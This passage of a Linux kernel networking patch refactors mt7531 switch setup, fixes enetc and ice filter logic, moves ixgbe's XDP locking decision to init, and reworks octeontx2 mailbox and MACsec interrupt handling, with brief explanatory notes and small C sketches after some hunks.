++		/* Disable forwarding by default on all ports */
++		mt7530_rmw(priv, MT7530_PCR_P(i), PCR_MATRIX_MASK,
++			   PCR_MATRIX_CLR);
++
++		/* Disable learning by default on all ports */
++		mt7530_set(priv, MT7530_PSC_P(i), SA_DIS);
++
++		mt7530_set(priv, MT7531_DBG_CNT(i), MT7531_DIS_CLR);
++
++		if (dsa_is_cpu_port(ds, i)) {
++			ret = mt753x_cpu_port_enable(ds, i);
++			if (ret)
++				return ret;
++		} else {
++			mt7530_port_disable(ds, i);
++
++			/* Set default PVID to 0 on all user ports */
++			mt7530_rmw(priv, MT7530_PPBV1_P(i), G0_PORT_VID_MASK,
++				   G0_PORT_VID_DEF);
++		}
++
++		/* Enable consistent egress tag */
++		mt7530_rmw(priv, MT7530_PVC_P(i), PVC_EG_TAG_MASK,
++			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
++	}
++
++	/* Flush the FDB table */
++	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
++	if (ret < 0)
++		return ret;
++
++	return 0;
++}
++
+ static int
+ mt7531_setup(struct dsa_switch *ds)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+ 	struct mt7530_dummy_poll p;
+-	struct dsa_port *cpu_dp;
+ 	u32 val, id;
+ 	int ret, i;
+ 
+@@ -2395,44 +2452,7 @@ mt7531_setup(struct dsa_switch *ds)
+ 	mt7531_ind_c45_phy_write(priv, MT753X_CTRL_PHY_ADDR, MDIO_MMD_VEND2,
+ 				 CORE_PLL_GROUP4, val);
+ 
+-	/* BPDU to CPU port */
+-	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
+-		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
+-			   BIT(cpu_dp->index));
+-		break;
+-	}
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
+-		   MT753X_BPDU_CPU_ONLY);
+-
+-	/* Enable and reset MIB counters */
+-	mt7530_mib_reset(ds);
+-
+-	for (i = 0; i < MT7530_NUM_PORTS; i++) {
+-		/* Disable forwarding by default on all ports */
+-		mt7530_rmw(priv, MT7530_PCR_P(i), PCR_MATRIX_MASK,
+-			   PCR_MATRIX_CLR);
+-
+-		/* Disable learning by default on all ports */
+-		mt7530_set(priv, MT7530_PSC_P(i), SA_DIS);
+-
+-		mt7530_set(priv, MT7531_DBG_CNT(i), MT7531_DIS_CLR);
+-
+-		if (dsa_is_cpu_port(ds, i)) {
+-			ret = mt753x_cpu_port_enable(ds, i);
+-			if (ret)
+-				return ret;
+-		} else {
+-			mt7530_port_disable(ds, i);
+-
+-			/* Set default PVID to 0 on all user ports */
+-			mt7530_rmw(priv, MT7530_PPBV1_P(i), G0_PORT_VID_MASK,
+-				   G0_PORT_VID_DEF);
+-		}
+-
+-		/* Enable consistent egress tag */
+-		mt7530_rmw(priv, MT7530_PVC_P(i), PVC_EG_TAG_MASK,
+-			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
+-	}
++	mt7531_setup_common(ds);
+ 
+ 	/* Setup VLAN ID 0 for VLAN-unaware bridges */
+ 	ret = mt7530_setup_vlan0(priv);
+@@ -2442,11 +2462,6 @@ mt7531_setup(struct dsa_switch *ds)
+ 	ds->assisted_learning_on_cpu_port = true;
+ 	ds->mtu_enforcement_ingress = true;
+ 
+-	/* Flush the FDB table */
+-	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
+-	if (ret < 0)
+-		return ret;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index f1d9ee2a78b0f..12175195d3968 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5109,6 +5109,7 @@ static const struct mv88e6xxx_ops mv88e6321_ops = {
+ 	.set_cpu_port = mv88e6095_g1_set_cpu_port,
+ 	.set_egress_port = mv88e6095_g1_set_egress_port,
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
++	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.reset = mv88e6352_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc_qos.c b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+index fcebb54224c09..a8539a8554a13 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc_qos.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+@@ -1255,7 +1255,7 @@ static int enetc_psfp_parse_clsflower(struct enetc_ndev_priv *priv,
+ 		int index;
+ 
+ 		index = enetc_get_free_index(priv);
+-		if (sfi->handle < 0) {
++		if (index < 0) {
+ 			NL_SET_ERR_MSG_MOD(extack, "No Stream Filter resource!");
+ 			err = -ENOSPC;
+ 			goto free_fmi;
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index 71cb15fcf63b9..652ef09eeb305 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -693,17 +693,18 @@ ice_eswitch_add_tc_fltr(struct ice_vsi *vsi, struct ice_tc_flower_fltr *fltr)
+ 	 * results into order of switch rule evaluation.
+ 	 */
+ 	rule_info.priority = 7;
++	rule_info.flags_info.act_valid = true;
+ 
+ 	if (fltr->direction == ICE_ESWITCH_FLTR_INGRESS) {
+ 		rule_info.sw_act.flag |= ICE_FLTR_RX;
+ 		rule_info.sw_act.src = hw->pf_id;
+ 		rule_info.rx = true;
++		rule_info.flags_info.act = ICE_SINGLE_ACT_LB_ENABLE;
+ 	} else {
+ 		rule_info.sw_act.flag |= ICE_FLTR_TX;
+ 		rule_info.sw_act.src = vsi->idx;
+ 		rule_info.rx = false;
+ 		rule_info.flags_info.act = ICE_SINGLE_ACT_LAN_ENABLE;
+-		rule_info.flags_info.act_valid = true;
+ 	}
+ 
+ 	/* specify the cookie as filter_rule_id */
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
+index f8156fe4b1dc4..0ee943db3dc92 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
+@@ -1035,9 +1035,6 @@ static void ixgbe_free_q_vector(struct ixgbe_adapter *adapter, int v_idx)
+ 	adapter->q_vector[v_idx] = NULL;
+ 	__netif_napi_del(&q_vector->napi);
+ 
+-	if (static_key_enabled(&ixgbe_xdp_locking_key))
+-		static_branch_dec(&ixgbe_xdp_locking_key);
+-
+ 	/*
+ 	 * after a call to __netif_napi_del() napi may still be used and
+ 	 * ixgbe_get_stats64() might access the rings on this vector,
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index faf3a094ac540..9b8848daeb430 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -6495,6 +6495,10 @@ static int ixgbe_sw_init(struct ixgbe_adapter *adapter,
+ 	set_bit(0, adapter->fwd_bitmask);
+ 	set_bit(__IXGBE_DOWN, &adapter->state);
+ 
++	/* enable locking for XDP_TX if we have more CPUs than queues */
++	if (nr_cpu_ids > IXGBE_MAX_XDP_QS)
++		static_branch_enable(&ixgbe_xdp_locking_key);
++
+ 	return 0;
+ }
+ 
+@@ -10288,8 +10292,6 @@ static int ixgbe_xdp_setup(struct net_device *dev, struct bpf_prog *prog)
+ 	 */
+ 	if (nr_cpu_ids > IXGBE_MAX_XDP_QS * 2)
+ 		return -ENOMEM;
+-	else if (nr_cpu_ids > IXGBE_MAX_XDP_QS)
+-		static_branch_inc(&ixgbe_xdp_locking_key);
+ 
+ 	old_prog = xchg(&adapter->xdp_prog, prog);
+ 	need_reset = (!!prog != !!old_prog);
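
The ixgbe hunks above move the XDP_TX locking decision from the XDP-setup path (a static_branch_inc with a matching dec on queue-vector teardown, which could fall out of balance) to a one-time static_branch_enable at init, driven purely by the CPU-versus-queue-count invariant. A minimal sketch of deciding such a flag once at init, with a plain int in place of the static key and an illustrative constant:

    #include <stdio.h>

    #define MAX_XDP_QS 8              /* illustrative queue limit */

    static int xdp_locking_enabled;   /* stands in for the static branch */

    static void driver_init(int nr_cpu_ids)
    {
        if (nr_cpu_ids > MAX_XDP_QS)
            xdp_locking_enabled = 1;  /* decided exactly once, never undone */
    }

    int main(void)
    {
        driver_init(16);
        printf("XDP_TX locking: %s\n", xdp_locking_enabled ? "on" : "off");
        return 0;
    }
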
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+index 2898931d5260a..9690ac01f02c8 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+@@ -157,7 +157,7 @@ EXPORT_SYMBOL(otx2_mbox_init);
+  */
+ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void **hwbase,
+ 			   struct pci_dev *pdev, void *reg_base,
+-			   int direction, int ndevs)
++			   int direction, int ndevs, unsigned long *pf_bmap)
+ {
+ 	struct otx2_mbox_dev *mdev;
+ 	int devid, err;
+@@ -169,6 +169,9 @@ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void **hwbase,
+ 	mbox->hwbase = hwbase[0];
+ 
+ 	for (devid = 0; devid < ndevs; devid++) {
++		if (!test_bit(devid, pf_bmap))
++			continue;
++
+ 		mdev = &mbox->dev[devid];
+ 		mdev->mbase = hwbase[devid];
+ 		mdev->hwbase = hwbase[devid];
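
The mbox change above passes a PF bitmap so that region setup is skipped for device IDs whose bit is clear. A sketch of the same bitmap-guarded loop with a hand-rolled test_bit() as a userspace stand-in for the kernel helper:

    #include <stdio.h>

    static int test_bit(int nr, const unsigned long *map)
    {
        return (map[nr / (8 * (int)sizeof(long))] >>
                (nr % (8 * (int)sizeof(long)))) & 1;
    }

    int main(void)
    {
        unsigned long pf_bmap = 0xB;      /* PFs 0, 1 and 3 active */
        int devid, ndevs = 4;

        for (devid = 0; devid < ndevs; devid++) {
            if (!test_bit(devid, &pf_bmap))
                continue;                 /* inactive PF: no mbox region */
            printf("init mbox region for PF %d\n", devid);
        }
        return 0;
    }
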
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index 8d5d5a0f68c44..11eeb36cf9a54 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -96,9 +96,10 @@ void otx2_mbox_destroy(struct otx2_mbox *mbox);
+ int otx2_mbox_init(struct otx2_mbox *mbox, void __force *hwbase,
+ 		   struct pci_dev *pdev, void __force *reg_base,
+ 		   int direction, int ndevs);
++
+ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void __force **hwbase,
+ 			   struct pci_dev *pdev, void __force *reg_base,
+-			   int direction, int ndevs);
++			   int direction, int ndevs, unsigned long *bmap);
+ void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_wait_for_rsp(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_busy_poll_for_rsp(struct otx2_mbox *mbox, int devid);
+@@ -242,9 +243,12 @@ M(NPC_MCAM_READ_BASE_RULE, 0x6011, npc_read_base_steer_rule,            \
+ M(NPC_MCAM_GET_STATS, 0x6012, npc_mcam_entry_stats,                     \
+ 				   npc_mcam_get_stats_req,              \
+ 				   npc_mcam_get_stats_rsp)              \
+-M(NPC_GET_SECRET_KEY, 0x6013, npc_get_secret_key,                     \
+-				   npc_get_secret_key_req,              \
+-				   npc_get_secret_key_rsp)              \
++M(NPC_GET_FIELD_HASH_INFO, 0x6013, npc_get_field_hash_info,                     \
++				   npc_get_field_hash_info_req,              \
++				   npc_get_field_hash_info_rsp)              \
++M(NPC_GET_FIELD_STATUS, 0x6014, npc_get_field_status,                     \
++				   npc_get_field_status_req,              \
++				   npc_get_field_status_rsp)              \
+ /* NIX mbox IDs (range 0x8000 - 0xFFFF) */				\
+ M(NIX_LF_ALLOC,		0x8000, nix_lf_alloc,				\
+ 				 nix_lf_alloc_req, nix_lf_alloc_rsp)	\
+@@ -1510,14 +1514,20 @@ struct npc_mcam_get_stats_rsp {
+ 	u8 stat_ena; /* enabled */
+ };
+ 
+-struct npc_get_secret_key_req {
++struct npc_get_field_hash_info_req {
+ 	struct mbox_msghdr hdr;
+ 	u8 intf;
+ };
+ 
+-struct npc_get_secret_key_rsp {
++struct npc_get_field_hash_info_rsp {
+ 	struct mbox_msghdr hdr;
+ 	u64 secret_key[3];
++#define NPC_MAX_HASH 2
++#define NPC_MAX_HASH_MASK 2
++	/* NPC_AF_INTF(0..1)_HASH(0..1)_MASK(0..1) */
++	u64 hash_mask[NPC_MAX_INTF][NPC_MAX_HASH][NPC_MAX_HASH_MASK];
++	/* NPC_AF_INTF(0..1)_HASH(0..1)_RESULT_CTRL */
++	u64 hash_ctrl[NPC_MAX_INTF][NPC_MAX_HASH];
+ };
+ 
+ enum ptp_op {
+@@ -1541,6 +1551,17 @@ struct ptp_rsp {
+ 	u64 clk;
+ };
+ 
++struct npc_get_field_status_req {
++	struct mbox_msghdr hdr;
++	u8 intf;
++	u8 field;
++};
++
++struct npc_get_field_status_rsp {
++	struct mbox_msghdr hdr;
++	u8 enable;
++};
++
+ struct set_vf_perm  {
+ 	struct  mbox_msghdr hdr;
+ 	u16	vf;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+index f68a6a0e3aa41..c43f19dfbd744 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+@@ -473,6 +473,8 @@ void mcs_flowid_entry_write(struct mcs *mcs, u64 *data, u64 *mask, int flow_id,
+ 		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_DATAX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, data[reg_id]);
++		}
++		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, mask[reg_id]);
+ 		}
+@@ -480,6 +482,8 @@ void mcs_flowid_entry_write(struct mcs *mcs, u64 *data, u64 *mask, int flow_id,
+ 		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_TX_SLAVE_FLOWID_TCAM_DATAX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, data[reg_id]);
++		}
++		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_TX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, mask[reg_id]);
+ 		}
+@@ -494,6 +498,9 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 
+ 	/* Flow entry */
+ 	flow_id = mcs->hw->tcam_entries - MCS_RSRC_RSVD_CNT;
++	__set_bit(flow_id, mcs->rx.flow_ids.bmap);
++	__set_bit(flow_id, mcs->tx.flow_ids.bmap);
++
+ 	for (reg_id = 0; reg_id < 4; reg_id++) {
+ 		reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 		mcs_reg_write(mcs, reg, GENMASK_ULL(63, 0));
+@@ -504,6 +511,8 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 	}
+ 	/* secy */
+ 	secy_id = mcs->hw->secy_entries - MCS_RSRC_RSVD_CNT;
++	__set_bit(secy_id, mcs->rx.secy.bmap);
++	__set_bit(secy_id, mcs->tx.secy.bmap);
+ 
+ 	/* Set validate frames to NULL and enable control port */
+ 	plcy = 0x7ull;
+@@ -528,6 +537,7 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 	/* Enable Flowid entry */
+ 	mcs_ena_dis_flowid_entry(mcs, flow_id, MCS_RX, true);
+ 	mcs_ena_dis_flowid_entry(mcs, flow_id, MCS_TX, true);
++
+ 	return 0;
+ }
+ 
+@@ -926,60 +936,42 @@ static void mcs_tx_misc_intr_handler(struct mcs *mcs, u64 intr)
+ 	mcs_add_intr_wq_entry(mcs, &event);
+ }
+ 
+-static void mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir)
++void cn10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr,
++				 enum mcs_direction dir)
+ {
+-	struct mcs_intr_event event = { 0 };
+-	int i;
++	u64 val, reg;
++	int lmac;
+ 
+-	if (!(intr & MCS_BBE_INT_MASK))
++	if (!(intr & 0x6ULL))
+ 		return;
+ 
+-	event.mcs_id = mcs->mcs_id;
+-	event.pcifunc = mcs->pf_map[0];
++	if (intr & BIT_ULL(1))
++		reg = (dir == MCS_RX) ? MCSX_BBE_RX_SLAVE_DFIFO_OVERFLOW_0 :
++					MCSX_BBE_TX_SLAVE_DFIFO_OVERFLOW_0;
++	else
++		reg = (dir == MCS_RX) ? MCSX_BBE_RX_SLAVE_PLFIFO_OVERFLOW_0 :
++					MCSX_BBE_TX_SLAVE_PLFIFO_OVERFLOW_0;
++	val = mcs_reg_read(mcs, reg);
+ 
+-	for (i = 0; i < MCS_MAX_BBE_INT; i++) {
+-		if (!(intr & BIT_ULL(i)))
++	/* policy/data overflow occurred */
++	for (lmac = 0; lmac < mcs->hw->lmac_cnt; lmac++) {
++		if (!(val & BIT_ULL(lmac)))
+ 			continue;
+-
+-		/* Lower nibble denotes data fifo overflow interrupts and
+-		 * upper nibble indicates policy fifo overflow interrupts.
+-		 */
+-		if (intr & 0xFULL)
+-			event.intr_mask = (dir == MCS_RX) ?
+-					  MCS_BBE_RX_DFIFO_OVERFLOW_INT :
+-					  MCS_BBE_TX_DFIFO_OVERFLOW_INT;
+-		else
+-			event.intr_mask = (dir == MCS_RX) ?
+-					  MCS_BBE_RX_PLFIFO_OVERFLOW_INT :
+-					  MCS_BBE_TX_PLFIFO_OVERFLOW_INT;
+-
+-		/* Notify the lmac_id info which ran into BBE fatal error */
+-		event.lmac_id = i & 0x3ULL;
+-		mcs_add_intr_wq_entry(mcs, &event);
++		dev_warn(mcs->dev, "BBE: Policy or data overflow occurred on lmac:%d\n", lmac);
+ 	}
+ }
+ 
+-static void mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir)
++void cn10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr,
++				 enum mcs_direction dir)
+ {
+-	struct mcs_intr_event event = { 0 };
+-	int i;
++	int lmac;
+ 
+-	if (!(intr & MCS_PAB_INT_MASK))
++	if (!(intr & 0xFFFFFULL))
+ 		return;
+ 
+-	event.mcs_id = mcs->mcs_id;
+-	event.pcifunc = mcs->pf_map[0];
+-
+-	for (i = 0; i < MCS_MAX_PAB_INT; i++) {
+-		if (!(intr & BIT_ULL(i)))
+-			continue;
+-
+-		event.intr_mask = (dir == MCS_RX) ? MCS_PAB_RX_CHAN_OVERFLOW_INT :
+-				  MCS_PAB_TX_CHAN_OVERFLOW_INT;
+-
+-		/* Notify the lmac_id info which ran into PAB fatal error */
+-		event.lmac_id = i;
+-		mcs_add_intr_wq_entry(mcs, &event);
++	for (lmac = 0; lmac < mcs->hw->lmac_cnt; lmac++) {
++		if (intr & BIT_ULL(lmac))
++			dev_warn(mcs->dev, "PAB: overflow occurred on lmac:%d\n", lmac);
+ 	}
+ }
+ 
+@@ -988,9 +980,8 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	struct mcs *mcs = (struct mcs *)mcs_irq;
+ 	u64 intr, cpm_intr, bbe_intr, pab_intr;
+ 
+-	/* Disable and clear the interrupt */
++	/* Disable  the interrupt */
+ 	mcs_reg_write(mcs, MCSX_IP_INT_ENA_W1C, BIT_ULL(0));
+-	mcs_reg_write(mcs, MCSX_IP_INT, BIT_ULL(0));
+ 
+ 	/* Check which block has interrupt*/
+ 	intr = mcs_reg_read(mcs, MCSX_TOP_SLAVE_INT_SUM);
+@@ -1037,7 +1028,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* BBE RX */
+ 	if (intr & MCS_BBE_RX_INT_ENA) {
+ 		bbe_intr = mcs_reg_read(mcs, MCSX_BBE_RX_SLAVE_BBE_INT);
+-		mcs_bbe_intr_handler(mcs, bbe_intr, MCS_RX);
++		mcs->mcs_ops->mcs_bbe_intr_handler(mcs, bbe_intr, MCS_RX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_INTR_RW, 0);
+@@ -1047,7 +1038,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* BBE TX */
+ 	if (intr & MCS_BBE_TX_INT_ENA) {
+ 		bbe_intr = mcs_reg_read(mcs, MCSX_BBE_TX_SLAVE_BBE_INT);
+-		mcs_bbe_intr_handler(mcs, bbe_intr, MCS_TX);
++		mcs->mcs_ops->mcs_bbe_intr_handler(mcs, bbe_intr, MCS_TX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_INTR_RW, 0);
+@@ -1057,7 +1048,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* PAB RX */
+ 	if (intr & MCS_PAB_RX_INT_ENA) {
+ 		pab_intr = mcs_reg_read(mcs, MCSX_PAB_RX_SLAVE_PAB_INT);
+-		mcs_pab_intr_handler(mcs, pab_intr, MCS_RX);
++		mcs->mcs_ops->mcs_pab_intr_handler(mcs, pab_intr, MCS_RX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_INTR_RW, 0);
+@@ -1067,14 +1058,15 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* PAB TX */
+ 	if (intr & MCS_PAB_TX_INT_ENA) {
+ 		pab_intr = mcs_reg_read(mcs, MCSX_PAB_TX_SLAVE_PAB_INT);
+-		mcs_pab_intr_handler(mcs, pab_intr, MCS_TX);
++		mcs->mcs_ops->mcs_pab_intr_handler(mcs, pab_intr, MCS_TX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_INTR_RW, 0);
+ 		mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT, pab_intr);
+ 	}
+ 
+-	/* Enable the interrupt */
++	/* Clear and enable the interrupt */
++	mcs_reg_write(mcs, MCSX_IP_INT, BIT_ULL(0));
+ 	mcs_reg_write(mcs, MCSX_IP_INT_ENA_W1S, BIT_ULL(0));
+ 
+ 	return IRQ_HANDLED;
+@@ -1156,7 +1148,7 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 		return ret;
+ 	}
+ 
+-	ret = request_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP),
++	ret = request_irq(pci_irq_vector(mcs->pdev, mcs->hw->ip_vec),
+ 			  mcs_ip_intr_handler, 0, "MCS_IP", mcs);
+ 	if (ret) {
+ 		dev_err(mcs->dev, "MCS IP irq registration failed\n");
+@@ -1175,11 +1167,11 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	mcs_reg_write(mcs, MCSX_CPM_TX_SLAVE_TX_INT_ENB, 0x7ULL);
+ 	mcs_reg_write(mcs, MCSX_CPM_RX_SLAVE_RX_INT_ENB, 0x7FULL);
+ 
+-	mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_ENB, 0xff);
+-	mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_ENB, 0xff);
++	mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_ENB, 0xFFULL);
++	mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_ENB, 0xFFULL);
+ 
+-	mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_ENB, 0xff);
+-	mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_ENB, 0xff);
++	mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_ENB, 0xFFFFFULL);
++	mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_ENB, 0xFFFFFULL);
+ 
+ 	mcs->tx_sa_active = alloc_mem(mcs, mcs->hw->sc_entries);
+ 	if (!mcs->tx_sa_active) {
+@@ -1190,7 +1182,7 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	return ret;
+ 
+ free_irq:
+-	free_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP), mcs);
++	free_irq(pci_irq_vector(mcs->pdev, mcs->hw->ip_vec), mcs);
+ exit:
+ 	pci_free_irq_vectors(mcs->pdev);
+ 	mcs->num_vec = 0;
+@@ -1325,8 +1317,11 @@ void mcs_reset_port(struct mcs *mcs, u8 port_id, u8 reset)
+ void mcs_set_lmac_mode(struct mcs *mcs, int lmac_id, u8 mode)
+ {
+ 	u64 reg;
++	int id = lmac_id * 2;
+ 
+-	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG(lmac_id * 2);
++	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG(id);
++	mcs_reg_write(mcs, reg, (u64)mode);
++	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG((id + 1));
+ 	mcs_reg_write(mcs, reg, (u64)mode);
+ }
+ 
+@@ -1484,6 +1479,7 @@ void cn10kb_mcs_set_hw_capabilities(struct mcs *mcs)
+ 	hw->lmac_cnt = 20;		/* lmacs/ports per mcs block */
+ 	hw->mcs_x2p_intf = 5;		/* x2p calibration intf */
+ 	hw->mcs_blks = 1;		/* MCS blocks */
++	hw->ip_vec = MCS_CN10KB_INT_VEC_IP; /* IP vector */
+ }
+ 
+ static struct mcs_ops cn10kb_mcs_ops = {
+@@ -1492,6 +1488,8 @@ static struct mcs_ops cn10kb_mcs_ops = {
+ 	.mcs_tx_sa_mem_map_write	= cn10kb_mcs_tx_sa_mem_map_write,
+ 	.mcs_rx_sa_mem_map_write	= cn10kb_mcs_rx_sa_mem_map_write,
+ 	.mcs_flowid_secy_map		= cn10kb_mcs_flowid_secy_map,
++	.mcs_bbe_intr_handler		= cn10kb_mcs_bbe_intr_handler,
++	.mcs_pab_intr_handler		= cn10kb_mcs_pab_intr_handler,
+ };
+ 
+ static int mcs_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+@@ -1592,7 +1590,7 @@ static void mcs_remove(struct pci_dev *pdev)
+ 
+ 	/* Set MCS to external bypass */
+ 	mcs_set_external_bypass(mcs, true);
+-	free_irq(pci_irq_vector(pdev, MCS_INT_VEC_IP), mcs);
++	free_irq(pci_irq_vector(pdev, mcs->hw->ip_vec), mcs);
+ 	pci_free_irq_vectors(pdev);
+ 	pci_release_regions(pdev);
+ 	pci_disable_device(pdev);
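
Among the mcs.c hunks above, the flowid TCAM update is restructured into two passes: all DATA words are written first, then all MASK words, instead of interleaving the two per word. A sketch of that two-loop ordering, where reg_write() is a printf stand-in for mcs_reg_write():

    #include <stdint.h>
    #include <stdio.h>

    static void reg_write(const char *name, int word, uint64_t val)
    {
        printf("%s[%d] <= %016llx\n", name, word, (unsigned long long)val);
    }

    static void tcam_entry_write(const uint64_t *data, const uint64_t *mask)
    {
        int w;

        for (w = 0; w < 4; w++)           /* first pass: all data words */
            reg_write("TCAM_DATA", w, data[w]);
        for (w = 0; w < 4; w++)           /* second pass: all mask words */
            reg_write("TCAM_MASK", w, mask[w]);
    }

    int main(void)
    {
        uint64_t data[4] = { 1, 2, 3, 4 };
        uint64_t mask[4] = { ~0ULL, ~0ULL, 0, 0 };

        tcam_entry_write(data, mask);
        return 0;
    }
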
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+index 64dc2b80e15dd..0f89dcb764654 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+@@ -43,24 +43,15 @@
+ /* Reserved resources for default bypass entry */
+ #define MCS_RSRC_RSVD_CNT		1
+ 
+-/* MCS Interrupt Vector Enumeration */
+-enum mcs_int_vec_e {
+-	MCS_INT_VEC_MIL_RX_GBL		= 0x0,
+-	MCS_INT_VEC_MIL_RX_LMACX	= 0x1,
+-	MCS_INT_VEC_MIL_TX_LMACX	= 0x5,
+-	MCS_INT_VEC_HIL_RX_GBL		= 0x9,
+-	MCS_INT_VEC_HIL_RX_LMACX	= 0xa,
+-	MCS_INT_VEC_HIL_TX_GBL		= 0xe,
+-	MCS_INT_VEC_HIL_TX_LMACX	= 0xf,
+-	MCS_INT_VEC_IP			= 0x13,
+-	MCS_INT_VEC_CNT			= 0x14,
+-};
++/* MCS Interrupt Vector */
++#define MCS_CNF10KB_INT_VEC_IP	0x13
++#define MCS_CN10KB_INT_VEC_IP	0x53
+ 
+ #define MCS_MAX_BBE_INT			8ULL
